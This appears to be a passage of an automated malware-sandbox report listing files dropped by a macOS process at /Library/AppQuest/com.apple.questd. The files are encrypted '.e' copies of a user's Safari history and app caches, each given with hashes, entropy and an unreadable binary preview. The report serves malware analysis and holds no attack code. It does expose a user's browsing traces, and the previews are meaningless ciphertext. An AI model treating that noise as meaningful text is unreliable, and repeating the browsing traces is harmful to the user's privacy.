                                                                                                    Preview: ..@.7R..V.'......Ssv.xZ[H......!..s..<....nS<...g...U.Yct.......X......g..a...bO(s......r.d..$jS.J...0..)....).7.....|.............,t.9...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.http:%2F%2Fwww.faronics.com%2Fde%2Fdownloads_de%2Fdownload-files_de%2F?product=DFS.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):442
                                                                                                    Entropy (8bit):5.567464724367191
                                                                                                    Encrypted:false
                                                                                                    MD5:B2B9AAAAB6D5F627053D061A75F26AEF
                                                                                                    SHA1:C71B803EE5C723A9B8AA9C3BA5ED222FDE565402
                                                                                                    SHA-256:A5DF378FD18DF4F3BB02064DCEF721EDA995CA932DC4CC54D206B131DCA2E0E7
                                                                                                    SHA-512:B7EED1667F938941F2A22870E440303998A7747BA12880284CB88F9A4A093684E0946CBD22A9C1564C71FC74698B241586C9968DFA2C1241EA8154DFC96FBFAA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..V.'......Ssv.xZ[H......!..s..<....nS<...g...U.Yct.......X......g..a...bO(s.......E....+..J...0..)....).7.....|...............V(...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.http:%2F%2Fwww.faronics.com%2Fde%2Fdownloads_de%2Fdownload-form_de%2F?product=DFM.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3914
                                                                                                    Entropy (8bit):7.845363416197051
                                                                                                    Encrypted:false
                                                                                                    MD5:0B0113480354C9F427F1E0968B96FC89
                                                                                                    SHA1:452D23A94F10E3FD03A9C601171CAF2B299E52DE
                                                                                                    SHA-256:2827AFD30E4D1AB953679E480914E02967A1E6752A333F33D85F91F5108D2F2F
                                                                                                    SHA-512:88D567D462300A8993AE9D5D22C71E34823E9075D920C74EE27169429D909DD9A605C3E4D5C0AEF3C85504FF3079808F0EE3E5B83CE440435212B6D4AA21D4F9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......FQ.b.8...R.Z. .V...7..]F.'.........V.K.t.`;-...1.......I0Q{...[.iv.c.U..4W.J.w.zJ.19.......cersQg......s.`..(,u.....).T%Bt....sA.B.*.....t..-.Qx.B......{.a.+.GXy.E.4@.X.H.........J?.<c;..Q............a.......H........-8.....'..g.. |"....#.w`~S..a7...n/P29..c......p.S...7.9..Ki.....<./..m.b.4.%....Oj-.......X..QG...F..mHz........W....w.{...\..8}...f.O.[.D..."3E.Y&.....F.."....Z.hX...0..(.k/...w....V..."N..w.<.......{.u.n:A4juF....7.~..e...w.i..k.w0\.....65..'.............z#.j...Q].3.VZ.0....v...X.bE..'.....D..}n.t....B.,.."L...........X..8.D......d-&...'$WYBb.....k.N;...q..^.o.u.G..]-..Lo.l.b...<.G....J.h...A;........?.l...._%.TKA.b.h]D.._]..n0.u\.i.Z..,>..s..c....s.x.%$..U....[..d..8.e z3aX../3......d..),..j.j...c.t<.=..@.MZ....,.....+.l....9.........'...._....;r~G3.l.iK....ZJ.t(^=..=;3t..m....N....C. 9KD.....o..,k.u.....5?F....!.I...q.7..).....%|..s.h.Tm....yx5....j6..#[.W...v.c.=\K..4;.f.....#zz\5.....ZF..........{....0....@....{...s..E..U....<Q...../...z.MZ....,....fn..y
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.http:%2F%2Fwww.faronics.com%2Fde%2Fdownloads_de%2Fdownload-form_de%2F?product=DFS.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3842
                                                                                                    Entropy (8bit):7.842099247290917
                                                                                                    Encrypted:false
                                                                                                    MD5:69274843B0B252D9FB5F0EFE7188383E
                                                                                                    SHA1:4DB7C39B72359946D4E92D97B428EA6BC15B225C
                                                                                                    SHA-256:49E4D86A729E90311A9C1536D3286F8673AF27CF893A2AFCA62212D4A5781CAD
                                                                                                    SHA-512:A870227C7CB56FD66284DE3ADB6465F56C7CBBB29320CBF2BA2814F7BED4014EE5BCA4E9E557B8BF227C43EA8F60CE4A93AD8193770478FB5708A60208E72826
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......FQ.b.8...R.Z. .V...7..]F.'.........V.K.t.`;-...1.......I0Q{...[.iv.c.U..4W.J.w.zJ.19.......c.m.!*.n....s.`..(,u.....).T%Bt..P.-pe........t..-.Qx.B......{.a.+.GXy.E.4@.X.H.........J?.<c;..Q............a.......H........-8.....'..g.. |"....#.w`~S..a7...n/P29..c......p.S...7.9..Ki.....<./..m.b.4.%....Oj-.......X..QG...F..mHz........W....w.{...\..8}...f.O.[.D..."3E.Y&.....F.."....Z.hX...0..(.k/...w....V..."N..w.<.......{.u.n:A4juF....7.~..e...w.i..k.w0\.....65..'.............z#.j...Q].3.VZ.0....v...X.bE..'.....D..}n.t....B.,.."L...........X..8.D......d-&...'$WYBb.....k.N;...q..^.o.u.G..]-..Lo.l.b...<.G....J.h...A;........?.l...._%.TKA.b.h]D.._]..n0.u\.i.Z..,>..s..c....s.x.%$..U....[..d..8.e z3aX../3......d..),..j.j...c.t<.=..@.MZ....,.....+.l....9.........'...._....;r~G3.l.iK....ZJ.t(^=..=;3t..m....N....C. 9KD.....o..,k.u.....5?F....!.I...q.7..).....%|..s.h.Tm....yx5....j6..#[.W...v.c.=\K..4;.f.....#zz\5.....ZF..........{....0....@....{...s..E..U....<Q...../...z.MZ....,....fn..y
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.http:%2F%2Fwww.faronics.com%2Fde%2Fproducts%2Fdeep-freeze%2Fmac%2F.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12402
                                                                                                    Entropy (8bit):7.9538953583826
                                                                                                    Encrypted:false
                                                                                                    MD5:4EEE72BD3C93E8E28AB62CFC6501DBE7
                                                                                                    SHA1:659AC0143DCE54A76E75818D29CD5C9BD8575EDA
                                                                                                    SHA-256:D6A0FEF131403893A372FB0034A682E61C064CDC7DD3D684BCD1B288708228E5
                                                                                                    SHA-512:AB5F3DBA9BDFE832ECA6B9901C7A8FECBB7E93CB4A0DB11A91511935D650A87952FB99F02E3B5E00834FC665A33CA32915860C66CB801D54B42A64879B0A1BBB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......FQ.b.8...R.Z. .V...7..]F.'...r-..j.:.K.t.`;-...1......1?...3$..|.........c....%2.a...9D..^xI...D5...5b....ga.w.}...j..)S.h!...3v......f.~...S..3F../1.p|.B..>-........p}.l.f.....sD.r.{........@."..&....v.s.^.{H...@.A.,..=....k.c....]..O....({.2K..........8..Lm...w..-..a.I...;....t.3O.P..(X_.U.NE..Vv..!:."n!F.?"..$..9.O...I<....]...)nw.D...C~.......M.+...@..x...e..b-.X..ma.&..1-GW..{.u.5....3..C.b......M#..xk~..&.B9...8.x....'m.>;_k.Y...Rx..t8.x....'m.>;_k.Ymn0..oD@-'......N...;..F.k*$'$&.R....z......am..F..j...o|.0D...(.p.<.....OI..s"L..V]$...$.h....'.".._..$f.f=.R1.F....c..9....C.UH..u.O..3...p...0X8.u.pF\.3b.!...v...;......NF...Y.3..t.(z.vh..m..W.[. .Uj-...Tm.&7'.)./....T..`.@;`.>m...8.J...5.r....x...'..U.3............t..Zy.../...<PI.Bm.d...3o..../.9...R........dq.?...p)..._."..q....7|%.....sR............8\.B.K.k/.>..S.....'.......#A....C.._J*Kzq.....xR..n.!TGTz....@.......q....9p.p....i!6..u..)G..Oh..Rh}..K...*HCNG.%..D}&..W4y.9.l.O.....]-2];..]......7~.4E&...)?.Z../4.6..
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fjava.com%2Fde%2Fdownload%2F.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):442
                                                                                                    Entropy (8bit):5.56828881118715
                                                                                                    Encrypted:false
                                                                                                    MD5:BBB87EFE3D400CA86A789DE50FA6FD99
                                                                                                    SHA1:921D0C5653F942F08D84B1E85997BD7C30874A39
                                                                                                    SHA-256:014AC8419A994A53D999A431BD4221BAB481A5D72B89BC8190503F572DCC01B2
                                                                                                    SHA-512:414441B83993084D6B8F3AD2DE2F8728BC5E611FEADCD3DA0B82F560CDAE33AB56FD67C0DD21D51A718FD59C4DDC02C5A510CD0F571311B0F193418A46A05392
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..*."..R.-.Ssv.xZ[._.......U...).....I0Q{.n.*)....<!:..b..j.w..,.=.....P..t..$..........W......j.ph...7...I+.....0...........`......................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fjava.com%2Fde%2Fdownload%2Fmac_download.jsp.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):482
                                                                                                    Entropy (8bit):5.820059774514199
                                                                                                    Encrypted:false
                                                                                                    MD5:4AF21B7B0FA9EDB08163AA30D74CF0BD
                                                                                                    SHA1:F664653CA30B87EC3C1E37F0AB19AEF37A714F35
                                                                                                    SHA-256:39829C850CFB83744FCAA11C192103703D3FD7BE60D586E2B4C7C1639C6A85D3
                                                                                                    SHA-512:6E536D1622F69DA2CBA004600F53B2F6C946BD15298C4F4B0DB760C781A707C9AEACF32888277668929792604401CB68A9B2E5D805E96C92845FFCD570589338
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..*."..R.-.Ssv.xZ[.h.O..|j.U...).....I0Q{.B.y.Z......WQ......[.J$.^48.c+...U..h.|.s.,){>..-o..v....BU.....Z'5.Mw..l...Y.N3y...a....e=.g...h...7...I+.....0........;..!j.\...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fjava.com%2Fen%2Fdownload%2Finstalled.jsp.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):5.563510077542336
                                                                                                    Encrypted:false
                                                                                                    MD5:63D59E695BBF09E94CEA85C5DEEEDFC2
                                                                                                    SHA1:7BA0E54B10A96FFF2759BB0BA196EF540E4D77EE
                                                                                                    SHA-256:36AA629B877AC7940020435C8DD7EF054FA4E4F2A90A6AEBF9978B4C97E83875
                                                                                                    SHA-512:6862F0F0C0E90BE8B15E7F344211E5B79A965FF25591350750586D4AEADAAC6E8CC4164839DE7798B4530A1C86A5E595D005C56C534204BAC682EB9FDAEB7FA5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..*."..R.-.Ssv.xZ[G{.YT..>.U...)....R@;4.....4..2.....vq/.A..?O..^.......l...J....hD-..b69{*..T....^.v...f............Yz....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fjava.com%2Finc%2FBrowserRedirect1.jsp?locale=de.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):426
                                                                                                    Entropy (8bit):5.467425623456864
                                                                                                    Encrypted:false
                                                                                                    MD5:2EBC8CCE5F4C7473AD73DBC1FF376C7F
                                                                                                    SHA1:6E37DAEE29EB2C21B2CB5803F1FCEB1B2F758CA5
                                                                                                    SHA-256:446BD7D050AE4F7F23A4C373CC9D6938AAA78C94574DF83D2590CFD6842D34B3
                                                                                                    SHA-512:4018B6E3D65A2E0E37B35D62718C7A883B64187FAF50F97434DB74515F1B1BE1DA4FE7A66B1F3CFB4A5AF1E327D6CFA04DDC8273EFAF2C8BB14BDE67A691E303
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..V.'......Ssv.xZ[.h..F..r.U...).....@a....p..[......R_.[{.....,qL.A....6..A...)M.~.$O.............m-.H.Z..&u:.0.I.y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fjava.com%2Fverify%2F?src=install.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):410
                                                                                                    Entropy (8bit):5.325557916282481
                                                                                                    Encrypted:false
                                                                                                    MD5:A0DA2CF56F704BDA869E5FDDB81AB78C
                                                                                                    SHA1:91BE2122442BCAA2ED68B7DC59F1410B9E974CDE
                                                                                                    SHA-256:17FA48DB84F19AE8E99A80D6F65D21E5CCE7F277E4D0A539EC95B1641A87369B
                                                                                                    SHA-512:644A4952B5C816F7CD8B5BC82880ADF11A0A8969C15AD4A217576B6B0DF68DC4D67BB8E63E4974315DC412ECC3E9679065B8859EB0EAC021497C3D3775AABEDC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..V.'......Ssv.xZ[D....m^B.U...)...]..ZL..L.......J.F........@X..l....\.....d.or............P.s....i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fwww.google.ch%2Fsearch?client=safari&rls=en&q=download+java+1.8+download&ie=UTF-8&oe=UTF-8&gfe_rd=cr&ei=j9suWe7YEcuX8Qf-_orABQ.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.124280592760065
                                                                                                    Encrypted:false
                                                                                                    MD5:04CBD7F0B31FFC592A8C82AAD99E7625
                                                                                                    SHA1:3584E2A7AE912084A2B94B0EB4C66F998039C8A5
                                                                                                    SHA-256:E96505F12CBFB78212528C4F1C24A6217F62CB2AD769227793E617653CB86C69
                                                                                                    SHA-512:FFBA8AB7397AF40305E011AA14F28BD8EC5113D0C9A7DC5BBF5005BEAB73742E7FE2F795D1BFC42763D6AC0EF94A90CAC40BCC4D3BBDDF15F0D9806382C387AE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..*."..R.-.Ssv.xZ[v.jL...Lk......q.(.(70..x..N.n....}.8.......q.uc.K(*..%..Z..l.....W+..H.k...`R..Q|i.........I.iT0..D..W.*..7....rO....*...H...+.".zAd..c4nb...&.......8.7...ah. .kf..."...G...-c.g.....M{*..T....^.v...f........\.hM......................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fwww.google.ch%2Fsearch?client=safari&rls=en&q=faronics+deep+freez+mac+download&ie=UTF-8&oe=UTF-8&gfe_rd=cr&ei=x90uWa_jCevI8geGtJLoAQ%23q=faronics+deep+freeze+mac+download.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:cannot open `dropped\.https_%2F%2Fwww.google.ch%2Fsearch_client=safari&rls=en&q=faronics+deep+freez+mac+download&ie=UTF-8&oe=UTF-8&gfe_rd=cr&ei=x90uWa_jCevI8geGtJLoAQ%23q=faronics+deep+freeze+mac+download.webhistory.e.375.dr' (No such file or directory)
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.323454251986935
                                                                                                    Encrypted:false
                                                                                                    MD5:7DDC1E83876DD8310BF2F27A84461153
                                                                                                    SHA1:F1B0D3B24E4E7A49BBD676B91AF1F01EAC9C5349
                                                                                                    SHA-256:2D4C2887499C8806B6202DFB2C77C731F9A2637F98BAA4472229E4C405FAC356
                                                                                                    SHA-512:F8D45A9F8A43BA210445B701A7F7052573717EAAF6813C2F287AC3E971A29F9F09A7E7B17B2B2236A525DB8F133B32734ECCF080F743664F4A20503F0EE57866
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..*."..R.-.Ssv.xZ[.{..z...k......q.(.(70..x..N.n....}.8.......q.uc2..1F..........T*..(D<.......8Bi...`......5o.}..;...j.S.}...K9......2.q....Q.Z......Z.R..+7..F%$Q\....m......o..#.l..Np@[.D./..^.u.d,.>..........O...#....&.q....s.K.1.a.......i....D..s...{).."..d.t............y....H..!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fwww.google.ch%2Fsearch?client=safari&rls=en&q=faronics+deep+freez+mac+download&ie=UTF-8&oe=UTF-8&gfe_rd=cr&ei=x90uWa_jCevI8geGtJLoAQ.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):562
                                                                                                    Entropy (8bit):6.234887167169907
                                                                                                    Encrypted:false
                                                                                                    MD5:F9194FCF50E162DDDDAFFEA9D249418E
                                                                                                    SHA1:0321D9C2984D629A00760C0C291038494BF44BE2
                                                                                                    SHA-256:8A7D5953AEE7A2238A2006E63D77CEA71FA95A602A7C959EEB2BB9E212EEE923
                                                                                                    SHA-512:4152256B950BC6FF392FCAAC977E307E459338083DA9D460DCE6ABC692907DD3DB2FFE062810A4F59A203EB6C8A7E185C749285753AFFD16047A915B36EA4E8A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..*."..R.-.Ssv.xZ[.o..UC#.k......q.(.(70..x..N.n....}.8.......q.uc2..1F..........T*..(D<.......8Bi...`......5o.}..;...j.S.}...K9......2.q....Q.Z......Z.R.\n...w....8f#&.\;......m.d.Sf).....of..a.4:...oS.....]c.k7...wbS....|.. %W...a.i.........9..sr.G..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fwww.google.com%2Fsearch?client=safari&rls=en&q=download+java+1.8+download&ie=UTF-8&oe=UTF-8.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):466
                                                                                                    Entropy (8bit):5.788120068368739
                                                                                                    Encrypted:false
                                                                                                    MD5:884064DB96048D98C362405BE2CD860B
                                                                                                    SHA1:5653FAA2B969B5C5B323300D407DD726333C897F
                                                                                                    SHA-256:276C929C9317AA87F4F1AE55BDAEECD92D38E25E2B2EF357FF6F130370D4BA48
                                                                                                    SHA-512:51C96800B1A1EFB711D781F47CD9939E332D345EF4CB3DE27F992A901A011C8BCF70C05D99EBACD3886400A39B5735DE0C8C06BBB5F3C8BA17F14D57D4D3680B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..V.'......Ssv.xZ[..L.41o.k......q.:..~..U'H.L.D.%R<m..U.........G..lt..^z....j3.TQ...D./t4nb...&..\..F...B..|R........*.={*..T...d!./...{........b.k..c;u..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.https:%2F%2Fwww.google.com%2Fsearch?client=safari&rls=en&q=faronics+deep+freez+mac+download&ie=UTF-8&oe=UTF-8.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):474
                                                                                                    Entropy (8bit):5.810775808912217
                                                                                                    Encrypted:false
                                                                                                    MD5:B4BA5C9E703A1A8D00645781BCC5E24D
                                                                                                    SHA1:048A0BBC9CC3101B174C31B66687B43B2F43202E
                                                                                                    SHA-256:6C7979946A09115CE81D98FFBCC89D39B092822F57EA211B2F8F49EC691FA852
                                                                                                    SHA-512:2CA278668FB4E2B9179196FB3198FC275DA563A3EA9BBA76FC807B4EC4225FE4F221BC9CBA1158656107CF525F737C3448698A274614F78C304A105FCF4496BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..V.'......Ssv.xZ[.h..c..rk......q.:..~..U'H.L.D.%R<m..U.........Ge{..S.....$...7......o.....EgI...L.H&...;...j.S....:.,..}.1I..$)h...7......ON.2...........}..'....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Oracle.MacJREInstaller/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3372180884548714
                                                                                                    Encrypted:false
                                                                                                    MD5:C86C0A540AABDB5E08B47873B8FFB8C8
                                                                                                    SHA1:3CA6CAD863A52997D18C42A90058FF92BA972EE6
                                                                                                    SHA-256:AA6F0CCAEC7D52853F33DC59088A5C4A0A38B68A36061FF11591B9B28B6DA3F7
                                                                                                    SHA-512:41666440701DB0E3283A7FD782580985DC4581E593BB1AA2FB68ADDBA1DAED56361F461B6155E230E9154EBD663DEDC6B3AF73A99AB8412C8632A3B47B90E0DC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i.......%=.Gc....].Y .l..P....>^....>.k....L.B. i.......%=.Gc....].YS0`0H.....>^.....I.%..:..f.!"c...9.o..h$.................g..gm,._.Y..<.!.......0!8..A...E....N^..................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Oracle.MacJREInstaller/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Oracle.MacJREInstaller/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.9368288002944567
                                                                                                    Encrypted:false
                                                                                                    MD5:5F4D72DFFFC4DA53ACC95A99BC9F16F0
                                                                                                    SHA1:9CEBB901951BAB827B87FFD6935AD0F3B4BF042C
                                                                                                    SHA-256:30157A008C612D6CFB9CB542089C497F5665CACEFE000534FC2CD144D2F15E8E
                                                                                                    SHA-512:C21F25A12C3A33633737A473AAF19DD115DE60E6A740B94D67CCF5DBF982AF9AE827C5E742DBD65528087AEB666F8B801505EDC121D9DE2C1F09E0A0C031299B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!..1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3338245838826603
                                                                                                    Encrypted:false
                                                                                                    MD5:CC3E6F984862C70EF2A4F9D920039811
                                                                                                    SHA1:ABCEB984682B1C805F179435C4E50310604B312A
                                                                                                    SHA-256:27278CD80EF36556ECE7E386B0E1A00FBE88251D44890618BCBE68BFCE32F12C
                                                                                                    SHA-512:773C2497B9767C690D3C5965EE9C3064F90EE0843E1B1897C0000654CC13AB32E4DB465227A40FD36EA2FA3314FC416871B6EA9D1158C093B966E33FA7E84C80
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.B. i.......%=.G+............;..j.CM-...>.k....L.B. i.......%=.G+.......-.......j.CM-............).@.....9.o..h$.................g..gm,._.Y..<.!.......0!8..A...E....N^..................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):41564
                                                                                                    Entropy (8bit):4.7518259797108
                                                                                                    Encrypted:false
                                                                                                    MD5:9AE09F08E5D6E41A2920D148F6EE2B44
                                                                                                    SHA1:A109528A87E8A8A084E269155951C13D6C64C87C
                                                                                                    SHA-256:070622673D6F6012C96770CB95BDE7783016D286515CEDE05B6FFDD9ADDDFEB0
                                                                                                    SHA-512:0892E65D3B583D0DAEC74F5410721364CB9E8CD5B4768A72FA3C423131818093E754A3A9DAA64EFF50F081E3BA8E3E806B7E4848095B047B04760D3DC45BAF04
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$........;....... %....ON.2......;..XvuY.. iC...[.~f.....y...........L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.5730561443570683
                                                                                                    Encrypted:false
                                                                                                    MD5:40BEFF749B8CBEE0E4DF7ED2E7D08E6C
                                                                                                    SHA1:5903E6DBCC12A22D08743AE0D7171A62D7E84565
                                                                                                    SHA-256:6199DB6D4CA69E0A2FA03CA5A1E0418F25CE1949C0470672FEF88A3977E414D5
                                                                                                    SHA-512:1B1CF74FC4D86797ED645FC2FCDCE3B6C41DF450D296189D8D2B80A24A31AA623E46E22A69E0B5BE26ED64F667B8A35D2086E3FBB50C9FE0A92001EEFA08F981
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!..1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/fsCachedData/.D6CDD17E-8891-473B-B10C-1BC3383751DC.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):911801
                                                                                                    Entropy (8bit):7.999778362571402
                                                                                                    Encrypted:true
                                                                                                    MD5:255052424203AD5CD1D9D288DD2D3832
                                                                                                    SHA1:34EAD9CC71ACD07F6CF67C3E9AD1756B6EEF397D
                                                                                                    SHA-256:C8CE70B8368D97DE20D6414B96B34A0E446D8A95A6FF08143A8C166FFCCE10F3
                                                                                                    SHA-512:FB59D407F699A3379054966B3086B2E60871F8D428C49E019D5D69E980863511A11DE27C26CA48B352EA767487FB7B689231B284E097E664CC3FE2F6A5677BBE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
